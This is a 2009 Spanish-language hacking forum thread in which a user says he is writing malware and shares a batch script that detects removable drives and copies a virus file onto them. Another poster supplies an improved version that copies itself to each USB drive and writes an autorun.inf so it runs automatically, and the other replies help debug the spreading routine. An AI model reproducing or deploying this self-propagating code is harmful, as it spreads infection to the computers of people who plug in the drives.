Foro de elhacker.net

Programación => Scripting => Mensaje iniciado por: LauBuru en 29 Marzo 2009, 21:39 pm


Título: Script batch para infeccion a traves de Unidades Extraibles
Publicado por: LauBuru en 29 Marzo 2009, 21:39 pm
Bueno estoy codeando un malware que no estya terminado, e optado por el metodo de propagacion a traves de unidades extraibles (USB,SlimCard,Memory Stick,etc...)
Os dejo un script para detectar e copyar archivos en unidades extraible, pruebenlo haber que les parece, no creo que haya errores pues funciona perfectamente, pero si encuentran algo diganmelo porfa

Un saludo gente    ;D


Código:
@echo off
echo. > unidad.txt
for %%a in ( A: B: C: D: E: F: G: H: I: J: K: L: M: N: Ñ: O: P: Q: R: S: T: U: V: W: X: Y: Z: ) do (
 fsutil fsinfo drivetype %%a >> unidad.txt)
type unidad.txt | find "extra" >unExtra.txt
for /f "tokens=1" %%b in (unExtra.txt) do ( call :infect %%a)
:infect
set pam=%*
copy %systemroot%\system32\virus.bat %pam%\virus.bat || goto :eof


Título: Re: Script batch para infeccion a traves de Unidades Extraibles
Publicado por: Germaniac en 30 Marzo 2009, 07:48 am
La unidad Ñ: no existe y puedes obtener las unidades con
Código:
fsutil fsinfo drives
Lo probe y sale un mensaje de error que No hay disco en la unidad A: (mi unidad de disquete) porque no tengo ningun disquete dentro.

Título: Re: Script batch para infeccion a traves de Unidades Extraibles
Publicado por: LauBuru en 30 Marzo 2009, 08:32 am
Ya se que la unidad Ñ no existe pero bueno pues todas las letras porsiaca, antes probe con "fsutil fsinfo drivetype" y "wmic logicaldisk get caption", y para mi este es el metodo mas sencillo, haunque no el mas eficaz pero bueno, poco a poco jejejeje

Un saludo   :)

PD:Modifique el code para evitar esos errores,  ;D

Título: Re: Script batch para infeccion a traves de Unidades Extraibles
Publicado por: SmartGenius en 30 Marzo 2009, 16:00 pm
Creo que deberias usa otro medoto que sea factible para cualquier usuario, porque el uso de FSUTIL esta limitado a users con privilegios administrativos...

Código:
@echo off
for %%a in (C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) do (
for /f "tokens=1" %%b in ('fsutil fsinfo drivetype %%a:^| find "extra"') do (
copy /y "%~0" "%%b:\codigo.bat"&echo.[autorun]>>"%%b:\autorun.inf"&echo.open=codigo.bat>>"%%b:\autorun.inf"))
Goto :Eof

Tambien podrias en el segundo FOR crear un ARRAY con todas las Letras que corresponden a los extraibles y guardarlo como variable para usarlo en cualqueir lado....

Saludos.

Título: Re: Script batch para infeccion a traves de Unidades Extraibles
Publicado por: LauBuru en 30 Marzo 2009, 22:08 pm
Veo que teneis el culo pelao ya en batch, bien bien asi aprendere mas, por cierto smart una pregunta los tokens de for no van de la A a la Z solamente "^" se admitiria y si asi fuera nos habilitaria el poder usar un tokens mas "^ + A-Z" pregunto pk me has dejao mosca  XD


Un saludo makinas   ;D


PD: Para pedir el tipo de unidades, lo puede hacer un user sin pribilegios de administracion (reg query lo puede usar un user normal?)


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines